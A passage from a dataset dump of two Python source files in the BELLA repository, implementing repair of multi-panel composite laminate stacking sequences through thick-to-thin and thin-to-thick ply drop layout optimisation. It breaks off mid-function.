"content_id": "66818c6b306a71a0c8665d2aeabfcfb482a8b93b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4906,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 108,
"path": "/src/RELAY/repair_mp.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nRepair strategy for guide based blending\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.BELLA.format_pdl import convert_ss_to_sst\r\nfrom src.RELAY.thick_to_thin import repair_thick_to_thin\r\nfrom src.RELAY.thin_to_thick import repair_thin_to_thick\r\nfrom src.RELAY.repair_reference_panel import repair_reference_panel\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\n\r\ndef repair_mp(multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0):\r\n \"\"\"\r\n repairs a multi-panel design to meet design and manufacturing guidelines\r\n and evaluates the performance of the repaired stacking sequence.\r\n\r\n The repair process is deterministic and attempts at conducting minimal\r\n modification of the original stacking sequence with a preference for\r\n modifying outer plies that have the least influence on out-of-plane\r\n properties.\r\n\r\n step 1:\r\n repair of the reference panel stacking sequence\r\n\r\n step 2:\r\n repair of the other panels by re-designing the ply drop layout\r\n\r\n INPUTS\r\n\r\n - n_panels: number of panels in the entire structure\r\n - reduced_ss: stacking sequence of the laminate\r\n - multipanel: multipanel structure\r\n - constraints: instance of the class Constraints\r\n - parameters: instance of the class Parameters\r\n - obj_func_param: objective function parameters\r\n - reduced_pdl: ply drop layout\r\n - mat: material properties\r\n \"\"\"\r\n #--------------------------------------------------------------------------\r\n # step 1 / reference panel repair\r\n #--------------------------------------------------------------------------\r\n print('---- Blending step 4.1 ----')\r\n success, reduced_lampam, reduced_sst, reduced_ss = repair_reference_panel(\r\n multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0)\r\n if not success:\r\n print('Blending step 4.1 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 1\r\n\r\n #--------------------------------------------------------------------------\r\n # step 2 / re-optimise the ply drop layout - thick-to-thin repair\r\n #--------------------------------------------------------------------------\r\n print('---- Blending step 4.2 ----')\r\n# print('reduced_sst', reduced_sst.shape)\r\n# print_list_ss(reduced_sst[:,:reduced_sst.shape[1] // 2])\r\n# print('SS_ref')\r\n# print_ss(ss_ref[:ss_ref.size // 2])\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n success, reduced_sst, reduced_lampam, reduced_ss = repair_thick_to_thin(\r\n reduced_lampam, reduced_sst, reduced_ss, multipanel,\r\n parameters, obj_func_param, constraints, mat=mat)\r\n if not success:\r\n print('Blending step 4.2 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 2\r\n # check that the reference panel stacking sequence has not been changed\r\n if (reduced_ss[multipanel.reduced.ind_ref] != ss_ref).any():\r\n raise Exception(\"\"\"\r\nReference stacking sequence modified during blending step 4.2\"\"\")\r\n\r\n #--------------------------------------------------------------------------\r\n # step 3 / re-optimise the ply drop layout - thin-to-thck repair\r\n #--------------------------------------------------------------------------\r\n print('---- Blending step 4.3 ----')\r\n success, reduced_sst, reduced_lampam, reduced_ss = repair_thin_to_thick(\r\n reduced_lampam, reduced_sst, reduced_ss, multipanel,\r\n parameters, obj_func_param, constraints, mat=mat)\r\n if not success:\r\n print('Blending step 4.3 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 3\r\n\r\n # check that the reference panel stacking sequence has not been changed\r\n if (reduced_ss[multipanel.reduced.ind_ref] != ss_ref).any():\r\n raise Exception(\"\"\"\r\nReference stacking sequence modified during blending step 4.3\"\"\")\r\n\r\n #--------------------------------------------------------------------------\r\n # return result\r\n #--------------------------------------------------------------------------\r\n# check_ply_drop_rules(reduced_sst, multipanel, constraints)\r\n\r\n # test for the ply counts\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n if reduced_ss[ind_panel].size != panel.n_plies:\r\n raise Exception(\"\"\"Wrong ply counts in the laminate.\"\"\")\r\n\r\n# print('Blending step 4 successful')\r\n return True, reduced_ss, reduced_sst, reduced_pdl, 4\r\n"
},
{
"alpha_fraction": 0.5071031451225281,
"alphanum_fraction": 0.5142063498497009,
"avg_line_length": 44.57646942138672,
"blob_id": "84d36b95a48d6ea822467ee46112cdd68c5b715c",
"content_id": "70ae8607f11648932f39ba0ac79d931efb28f875",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31676,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 680,
"path": "/src/RELAY/thin_to_thick.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used for the repair of panels with the thin-to-thick methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions and fibre orientations of the plies to add necessary to design\r\n the thicker panels are re-optimised with the objective to better match\r\n panel lamination parameter targets while also satisfying design and\r\n manufacturing constraints\r\n\r\n- repair_thin-to-thick\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n and some fibre orientations with the thin-to-thick methodology\r\n\r\n- modify_indices_2\r\n modifies the list of indices for the last ply drop positions so they become\r\n related to the last thickness and not to successive panel thicknesses\r\n\r\n- reduced_sst_to_plydrops\r\n returns the list of indices for plies added in each panel with reference\r\n to next panels\r\n\r\n- rebuild_sst and rebuild_sst_2\r\n reconstructs the reduced stacking sequence table after thin-to-thick repair\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\n#from src.guidelines.ply_drop_spacing import is_same_pdl\r\nfrom src.guidelines.contiguity import calc_penalty_contig_ss\r\nfrom src.guidelines.disorientation import calc_n_penalty_diso_ss\r\n# from src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.BELLA.objectives import calc_obj_one_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\n# if apply_balance_1_by_1 == True\r\n# - if an angled ply is added/removed from a balance panel, the next ply\r\n# to be removed/added rectify balance\r\n# otherwise\r\n# - all panels of the blending strip are enforced to be balance. This can\r\n# cause issues if the blending strip contains many panels with\r\n# incremental ply counts\r\napply_balance_1_by_1 = True\r\n\r\ndef repair_thin_to_thick(\r\n reduced_lampam, reduced_sst, reduced_ss,\r\n multipanel, parameters, obj_func_param, constraints, mat=0):\r\n \"\"\"\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n and some fibre orientations with the thin-to-thick methodology\r\n \"\"\"\r\n ### initialisation\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n n_plies_max = multipanel.reduced.n_plies_in_panels[-1]\r\n n_plies = multipanel.reduced.n_plies_ref_panel\r\n# print_list_ss(reduced_sst)\r\n\r\n # clean pdl by removing plies to be redesigned\r\n for ind in range(reduced_sst.shape[1])[::-1]:\r\n if reduced_sst[multipanel.reduced.ind_ref, ind] == -1:\r\n reduced_sst = np.delete(reduced_sst, np.s_[ind], axis=1)\r\n\r\n n_steps = multipanel.reduced.n_steps_thick\r\n ind_panel_tab = multipanel.reduced.ind_panel_thick_tab\r\n new_boundary_tab = multipanel.reduced.new_boundary_thick_tab\r\n\r\n# print('n_steps', n_steps)\r\n# print('ind_panel_tab', ind_panel_tab)\r\n# print('new_boundary_tab', new_boundary_tab)\r\n\r\n if n_steps == 0: # no change\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n\r\n ## number of plies in each direction\r\n initial_n_plies_per_angle = [\r\n None for ind in range(multipanel.reduced.n_panels)]\r\n n_plies_per_angle_ref = np.zeros(\r\n (constraints.n_set_of_angles), dtype='float16')\r\n for index in range(ss_ref.size):\r\n index = constraints.ind_angles_dict[ss_ref[index]]\r\n n_plies_per_angle_ref[index] += 1\r\n initial_n_plies_per_angle[multipanel.reduced.ind_ref] \\\r\n = np.copy(n_plies_per_angle_ref)\r\n n_plies_per_angle_tab = [initial_n_plies_per_angle]\r\n\r\n ## ply-drop layouts\r\n initial_pdl = [None for ind in range(multipanel.reduced.n_panels)]\r\n for ind in range(multipanel.reduced.ind_ref + 1):\r\n initial_pdl[ind] = reduced_sst[ind]\r\n pdls_tab = [initial_pdl]\r\n\r\n ## lamination parameters\r\n initial_lampam = [None for ind in range(multipanel.reduced.n_panels)]\r\n for ind in range(multipanel.reduced.n_panels):\r\n initial_lampam[ind] = reduced_lampam[ind]\r\n lampam_tab = [initial_lampam]\r\n\r\n\r\n ## penalties\r\n# initial_pdl_diso = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_diso[multipanel.reduced.ind_ref] = 0\r\n# penalty_diso_tab = [initial_pdl_diso]\r\n#\r\n# initial_pdl_contig = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_contig[multipanel.reduced.ind_ref] = 0\r\n# penalty_contig_tab = [initial_pdl_contig]\r\n\r\n # initial_pdl_oopo = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_oopo[multipanel.reduced.ind_ref] = 0\r\n # penalty_oopo_tab = [initial_pdl_oopo]\r\n\r\n# initial_pdl_10 = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_10[multipanel.reduced.ind_ref] = 0\r\n# penalty_10_tab = [initial_pdl_10]\r\n\r\n# initial_pdl_bal = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_bal[multipanel.reduced.ind_ref] = 0\r\n# penalty_bal_tab = [initial_pdl_bal]\r\n\r\n penalty_spacing_tab = [None]\r\n\r\n last_pdl_index_tab = [None]\r\n\r\n ## objectives\r\n obj_no_constraints_tab = [[\r\n None for ind in range(multipanel.reduced.n_panels)]]\r\n obj_no_constraints_tab[0][multipanel.reduced.ind_ref] = 0\r\n\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n\r\n angle_queue_tab = [np.array((), dtype=int)]\r\n\r\n n_obj_func_calls = 0\r\n\r\n if constraints.sym:\r\n n_plies -= 2\r\n else:\r\n n_plies -= 1\r\n\r\n for ind_step in range(n_steps):\r\n\r\n # number of plies previous stacking sequence\r\n if constraints.sym:\r\n n_plies += 2\r\n else:\r\n n_plies += 1\r\n\r\n ind_panel_now = ind_panel_tab[ind_step]\r\n\r\n# print('------------------------')\r\n# print('ind_step', ind_step)\r\n# print('------------------------\\n')\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n for node in range(len(obj_constraints_tab)):\r\n \r\n ### selection of node to be branched (first in the list)\r\n mother_pdl = pdls_tab.pop(0)\r\n mother_lampam = lampam_tab.pop(0)\r\n mother_n_plies_per_angle = n_plies_per_angle_tab.pop(0)\r\n mother_obj_no_constraints = obj_no_constraints_tab.pop(0)\r\n# mother_penalty_diso = penalty_diso_tab.pop(0)\r\n# mother_penalty_contig = penalty_contig_tab.pop(0)\r\n mother_angle_queue = angle_queue_tab.pop(0)\r\n # mother_penalty_oopo = penalty_oopo_tab.pop(0)\r\n# mother_penalty_10 = penalty_10_tab.pop(0)\r\n del penalty_spacing_tab[0]\r\n del last_pdl_index_tab[0]\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n\r\n # print('mother_pdl')\r\n # print(mother_pdl)\r\n\r\n ### branching + pruning for damage tolerance rule and covering rule\r\n # pd : index position new ply on new stacking sequence\r\n if constraints.covering:\r\n if constraints.sym:\r\n if constraints.n_covering == 1:\r\n child_pd_indices = np.arange(1, n_plies // 2 + 1)\r\n elif constraints.n_covering == 2:\r\n child_pd_indices = np.arange(2, n_plies // 2 + 1)\r\n else:\r\n if constraints.n_covering == 1:\r\n child_pd_indices = np.arange(1, n_plies)\r\n elif constraints.n_covering == 2:\r\n child_pd_indices = np.arange(2, n_plies - 1)\r\n else:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(n_plies // 2 + 1)\r\n else:\r\n child_pd_indices = np.arange(n_plies + 1)\r\n # print('child_pd_indices', child_pd_indices)\r\n\r\n n_tab_nodes = 0\r\n tab_child_pdl = []\r\n tab_penalty_spacing = []\r\n tab_angle_queue = []\r\n tab_last_pdl_index = []\r\n\r\n for one_pd_index in child_pd_indices:\r\n # print('one_pd_index', one_pd_index)\r\n\r\n ### branching for ply orientation of new ply\r\n child_angle = np.copy(constraints.set_of_angles, int)\r\n\r\n ### pruning for balance\r\n if constraints.bal:\r\n for ind_angle in range(constraints.n_set_of_angles)[::-1]:\r\n\r\n angle = child_angle[ind_angle]\r\n\r\n if apply_balance_1_by_1:\r\n if mother_angle_queue \\\r\n and angle != -mother_angle_queue[0]:\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n else:\r\n if mother_angle_queue:\r\n if angle != -mother_angle_queue[0]:\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n elif (ind_step == n_steps - 1 \\\r\n or new_boundary_tab[ind_step + 1]) \\\r\n and angle not in (0, 90):\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n\r\n for ind_angle in range(len(child_angle)):\r\n angle = child_angle[ind_angle]\r\n\r\n if constraints.bal:\r\n if mother_angle_queue:\r\n tab_angle_queue.append([])\r\n elif angle not in (0, 90):\r\n tab_angle_queue.append([angle])\r\n else:\r\n tab_angle_queue.append([])\r\n else:\r\n tab_angle_queue.append([])\r\n\r\n ### ply drop layout\r\n child_pdl = deepcopy(mother_pdl)\r\n # print('mumpdl')\r\n # print(child_pdl)\r\n\r\n if new_boundary_tab[ind_step]:\r\n child_pdl[ind_panel_now] = np.copy(\r\n child_pdl[ind_panel_now - 1])\r\n\r\n for ind_p in range(ind_panel_now):\r\n child_pdl[ind_p] = np.hstack((\r\n child_pdl[ind_p][:one_pd_index],\r\n -1,\r\n child_pdl[ind_p][one_pd_index:]))\r\n\r\n child_pdl[ind_panel_now] = np.hstack((\r\n child_pdl[ind_panel_now][:one_pd_index],\r\n child_angle[ind_angle],\r\n child_pdl[ind_panel_now][one_pd_index:]))\r\n\r\n if constraints.sym:\r\n for ind_p in range(ind_panel_now):\r\n child_pdl[ind_p] = np.hstack((\r\n child_pdl[ind_p][:n_plies - one_pd_index + 1],\r\n -1,\r\n child_pdl[ind_p][n_plies - one_pd_index + 1:]))\r\n\r\n child_pdl[ind_panel_now] = np.hstack((\r\n child_pdl[ind_panel_now][\r\n :n_plies - one_pd_index + 1],\r\n child_angle[ind_angle],\r\n child_pdl[ind_panel_now][\r\n n_plies - one_pd_index + 1:]))\r\n\r\n # print('child_pdl')\r\n # print(child_pdl)\r\n\r\n ### penalties for the ply-drop layout rule\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=child_pdl,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# print('penalty_spacing', penalty_spacing)\r\n\r\n tab_child_pdl.append(child_pdl[:])\r\n tab_penalty_spacing.append(penalty_spacing)\r\n tab_last_pdl_index.append(one_pd_index)\r\n# print('child_pdl', child_pdl)\r\n\r\n\r\n ### local pruning for the ply-drop layout rules\r\n indices_to_keep = []\r\n tab_penalty_spacing_for_pruning = np.copy(tab_penalty_spacing)\r\n if len(tab_penalty_spacing_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_penalty_spacing_for_pruning)\r\n indices_to_add = np.where(\r\n tab_penalty_spacing_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n tab_penalty_spacing_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n \r\n ### calculations of lay-up penalties and multi-panel objective\r\n # function values\r\n tab_child_n_plies_per_angle = []\r\n tab_child_lampam = []\r\n # tab_child_penalty_oopo = []\r\n# tab_child_penalty_diso = []\r\n# tab_child_penalty_contig = []\r\n tab_child_obj_no_constraints = []\r\n tab_child_obj_constraints = []\r\n# tab_child_penalty_10 = []\r\n\r\n for ind_pd in range(len(tab_child_pdl))[::-1]:\r\n ### calculation of the stacking sequence in the currently\r\n # optimised panel\r\n child_ss = np.copy(tab_child_pdl[ind_pd][ind_panel_now])\r\n child_ss = child_ss[child_ss != -1]\r\n # print('child_ss', child_ss.size)\r\n # print(child_ss[:child_ss.size // 2])\r\n\r\n ### calculation of penalties for the disorientation constraint\r\n if constraints.diso:\r\n penalty_diso = calc_n_penalty_diso_ss(\r\n child_ss, constraints)\r\n # pruning for disorientation\r\n if penalty_diso != 0:\r\n # print('diso')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_diso = 0\r\n# child_penalty_diso = deepcopy(mother_penalty_diso)\r\n# child_penalty_diso[ind_panel_now] = penalty_diso\r\n# print('child_penalty_diso', child_penalty_diso)\r\n\r\n ### calculation of penalties for the contiguity constraint\r\n if constraints.contig:\r\n penalty_contig = calc_penalty_contig_ss(\r\n child_ss, constraints)\r\n # pruning for contiguity\r\n if penalty_contig != 0:\r\n # print('contig')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_contig = 0\r\n# child_penalty_contig = deepcopy(mother_penalty_contig)\r\n# child_penalty_contig[ind_panel_now] = penalty_contig\r\n# print('child_penalty_contig', child_penalty_contig)\r\n\r\n ### calculation of the number of plies in each direction\r\n child_n_plies_per_angle = deepcopy(mother_n_plies_per_angle)\r\n if new_boundary_tab[ind_step]:\r\n child_n_plies_per_angle[ind_panel_now] = np.copy(\r\n child_n_plies_per_angle[ind_panel_now - 1])\r\n\r\n index_pd = tab_last_pdl_index[ind_pd]\r\n index = constraints.ind_angles_dict[child_ss[index_pd]]\r\n\r\n if constraints.sym:\r\n child_n_plies_per_angle[ind_panel_now][index] += 2\r\n else:\r\n child_n_plies_per_angle[ind_panel_now][index] += 1\r\n# print('child_n_plies_per_angle')\r\n# print(child_n_plies_per_angle)\r\n\r\n ### calculation of lamination parameters\r\n child_lampam = deepcopy(mother_lampam)\r\n child_lampam[ind_panel_now] \\\r\n = calc_lampam(child_ss, constraints)\r\n# print('child_lampam', child_lampam)\r\n\r\n ### 10% rule\r\n if constraints.rule_10_percent:\r\n if constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(\r\n child_ss,\r\n constraints,\r\n LPs=child_lampam[ind_panel_now],\r\n mp=False)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(\r\n child_n_plies_per_angle[ind_panel_now],\r\n constraints)\r\n # pruning for 10% rule\r\n if penalty_10 != 0:\r\n # print('10')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_10 = 0\r\n# print('mother_penalty_10', mother_penalty_10)\r\n# child_penalty_10 = deepcopy(mother_penalty_10)\r\n# child_penalty_10[ind_panel_now] = penalty_10\r\n # print('child_penalty_10', child_penalty_10)\r\n\r\n ### calculation of objective function values\r\n obj_no_constraints = calc_obj_one_panel(\r\n lampam=child_lampam[ind_panel_now],\r\n lampam_target=multipanel.reduced.panels[\r\n ind_panel_now].lampam_target,\r\n lampam_weightings=multipanel.reduced.panels[\r\n ind_panel_now].lampam_weightings)\r\n\r\n# print('mother_obj_no_constraints', mother_obj_no_constraints)\r\n child_obj_no_constraints = deepcopy(mother_obj_no_constraints)\r\n child_obj_no_constraints[\r\n ind_panel_now] = obj_no_constraints\r\n # print('child_obj_no_constraints', child_obj_no_constraints)\r\n\r\n child_obj_constraints = calc_obj_multi_panel(\r\n objective=child_obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=None,\r\n penalty_contig=None,\r\n penalty_oopo=None,\r\n penalty_10=None,\r\n penalty_bal_ipo=None,\r\n penalty_weight=None,\r\n with_Nones=True)\r\n# print('child_obj_constraints', child_obj_constraints)\r\n\r\n ### saving\r\n tab_child_n_plies_per_angle.append(child_n_plies_per_angle)\r\n tab_child_lampam.append(child_lampam)\r\n # tab_child_penalty_oopo.append(child_penalty_oopo)\r\n# tab_child_penalty_diso.append(child_penalty_diso)\r\n# tab_child_penalty_contig.append(child_penalty_contig)\r\n# tab_child_penalty_10.append(child_penalty_10)\r\n tab_child_obj_no_constraints.append(child_obj_no_constraints)\r\n tab_child_obj_constraints.append(child_obj_constraints)\r\n\r\n n_obj_func_calls += 1\r\n n_tab_nodes += 1\r\n\r\n ### local pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(tab_child_obj_constraints)\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n \r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_child_n_plies_per_angle = [\r\n tab_child_n_plies_per_angle[index] \\\r\n for index in indices_to_keep]\r\n tab_child_lampam = [tab_child_lampam[index] \\\r\n for index in indices_to_keep]\r\n # tab_child_penalty_oopo = [tab_child_penalty_oopo[index] \\\r\n # for index in indices_to_keep]\r\n# tab_child_penalty_diso = [tab_child_penalty_diso[index] \\\r\n# for index in indices_to_keep]\r\n# tab_child_penalty_contig = [tab_child_penalty_contig[index] \\\r\n# for index in indices_to_keep]\r\n# tab_child_penalty_10 = [tab_child_penalty_10[index] \\\r\n# for index in indices_to_keep]\r\n tab_child_obj_no_constraints = [\r\n tab_child_obj_no_constraints[index] \\\r\n for index in indices_to_keep]\r\n tab_child_obj_constraints = [tab_child_obj_constraints[index] \\\r\n for index in indices_to_keep]\r\n\r\n ### save local solutions as global solutions\r\n for ind in range(len(tab_child_obj_constraints)):\r\n\r\n pdls_tab.append(tab_child_pdl[ind])\r\n last_pdl_index_tab.append(tab_last_pdl_index[ind])\r\n penalty_spacing_tab.append(tab_penalty_spacing[ind])\r\n angle_queue_tab.append(tab_angle_queue[ind])\r\n n_plies_per_angle_tab.append(tab_child_n_plies_per_angle[ind])\r\n lampam_tab.append(tab_child_lampam[ind])\r\n# penalty_diso_tab.append(tab_child_penalty_diso[ind])\r\n# penalty_contig_tab.append(tab_child_penalty_contig[ind])\r\n # penalty_oopo_tab.append(tab_child_penalty_oopo[ind])\r\n# penalty_10_tab.append(tab_child_penalty_10[ind])\r\n obj_constraints_tab = np.hstack((\r\n obj_constraints_tab, tab_child_obj_constraints[ind]))\r\n obj_no_constraints_tab.append(\r\n tab_child_obj_no_constraints[ind])\r\n\r\n# ### remove duplicates\r\n# to_del = []\r\n# for ind_pdl_1 in range(len(pdls_tab)):\r\n# for ind_pdl_2 in range(ind_pdl_1 + 1, len(pdls_tab)):\r\n# if is_same_pdl(pdls_tab[ind_pdl_1],\r\n# pdls_tab[ind_pdl_2],\r\n# thick_to_thin=True,\r\n# ind_ref=multipanel.reduced.ind_ref):\r\n# to_del.append(ind_pdl_1)\r\n# break\r\n# to_del.sort(reverse=True)\r\n# for ind_to_del in to_del:\r\n# del pdls_tab[ind_to_del]\r\n# del penalty_spacing_tab[ind_to_del]\r\n# del last_pdl_index_tab[ind_to_del]\r\n# del angle_queue_tab[ind_to_del]\r\n# del n_plies_per_angle_tab[ind_to_del]\r\n# del lampam_tab[ind_to_del]\r\n# del penalty_diso_tab[ind_to_del]\r\n# del penalty_contig_tab[ind_to_del]\r\n# del penalty_oopo_tab[ind_to_del]\r\n# del penalty_10_tab[ind_to_del]\r\n# del obj_no_constraints_tab[ind_to_del]\r\n# obj_constraints_tab = np.delete(obj_constraints_tab,\r\n# np.s_[ind_to_del])\r\n\r\n #### global pruning for ply-drop layout rules\r\n indices_to_keep = []\r\n penalty_spacing_tab_for_pruning = np.copy(penalty_spacing_tab)\r\n if ind_step != n_steps - 1 \\\r\n and len(penalty_spacing_tab_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(penalty_spacing_tab_for_pruning)\r\n indices_to_add = np.where(\r\n penalty_spacing_tab_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n penalty_spacing_tab_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n# penalty_diso_tab = [penalty_diso_tab[index] \\\r\n# for index in indices_to_keep]\r\n# penalty_contig_tab = [penalty_contig_tab[index] \\\r\n# for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n# penalty_10_tab = [penalty_10_tab[index] \\\r\n# for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n #### global pruning for the other guidelines and stiffness optimality\r\n indices_to_keep = []\r\n tab_child_obj_constraints_for_pruning \\\r\n = np.copy(obj_constraints_tab)\r\n\r\n if ind_step != n_steps - 1 \\\r\n and len(tab_child_obj_constraints_for_pruning) \\\r\n > parameters.global_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.global_node_limit2:\r\n\r\n min_value = min(tab_child_obj_constraints_for_pruning)\r\n index_to_add = np.where(\r\n tab_child_obj_constraints_for_pruning == min_value)[0][0]\r\n indices_to_keep.append(index_to_add)\r\n tab_child_obj_constraints_for_pruning[index_to_add] = 1000\r\n\r\n indices_to_keep.sort()\r\n pdls_tab = [pdls_tab[index] for index in indices_to_keep]\r\n last_pdl_index_tab = [last_pdl_index_tab[index] \\\r\n for index in indices_to_keep]\r\n penalty_spacing_tab = [penalty_spacing_tab[index] \\\r\n for index in indices_to_keep]\r\n angle_queue_tab = [angle_queue_tab[index] \\\r\n for index in indices_to_keep]\r\n n_plies_per_angle_tab = [n_plies_per_angle_tab[index] \\\r\n for index in indices_to_keep]\r\n lampam_tab = [lampam_tab[index] \\\r\n for index in indices_to_keep]\r\n# penalty_diso_tab = [penalty_diso_tab[index] \\\r\n# for index in indices_to_keep]\r\n# penalty_contig_tab = [penalty_contig_tab[index] \\\r\n# for index in indices_to_keep]\r\n # penalty_oopo_tab = [penalty_oopo_tab[index] \\\r\n # for index in indices_to_keep]\r\n# penalty_10_tab = [penalty_10_tab[index] \\\r\n# for index in indices_to_keep]\r\n obj_constraints_tab = [obj_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n obj_no_constraints_tab = [obj_no_constraints_tab[index] \\\r\n for index in indices_to_keep]\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n # select best repaired solution\r\n index = np.argmin(obj_constraints_tab)\r\n reduced_sst = pdls_tab[index]\r\n reduced_lampam = lampam_tab[index]\r\n reduced_ss = convert_sst_to_ss(reduced_sst)\r\n\r\n ## check for symmetry\r\n if constraints.sym:\r\n for elem in reduced_ss[0: 